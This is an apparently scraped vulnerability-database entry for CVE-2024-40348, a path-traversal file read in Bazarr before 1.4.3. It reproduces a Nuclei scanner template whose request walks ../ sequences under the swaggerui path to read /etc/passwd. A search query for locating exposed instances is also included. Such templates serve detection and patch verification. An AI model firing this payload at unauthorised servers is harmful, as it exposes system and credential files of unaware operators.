Bazarr < 1.4.3 - Arbitrary File Read

2024-07-1818:52:31

ProjectDiscovery

github.com

bazarr arbitrary file read

CVSS3

8.2

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L

AI Score

6.9

Confidence

High

JSON

Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability.

id: CVE-2024-40348

info:
  name: Bazarr < 1.4.3 - Arbitrary File Read
  author: securityforeveryone
  severity: high
  description: |
    Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability.
  reference:
    - https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md
    - https://www.bazarr.media/
    - https://github.com/bigb0x/CVE-2024-40348
  classification:
    epss-score: 0.00043
    epss-percentile: 0.09329
  metadata:
    verified: true
    max-request: 2
    vendor: morpheus65535
    product: bazarr
    fofa-query: title=="Bazarr" && icon_hash="-1983413099"
  tags: cve,cve2024,bazarr,lfi

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/login"

    matchers:
      - type: word
        part: body
        words:
          - '<title>Bazarr</title>'
          - 'content="Bazarr'
          - 'window.Bazarr'
        condition: or
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c128400c428439af0515a4dcba55a151ea17919dc89be9512d17c913f651688b022100f867f890a69f2d0defc36e8eeddd85d923759f1db9f56bafeaffebbd039531cc:922c64590222798bb761d5b6d8e72950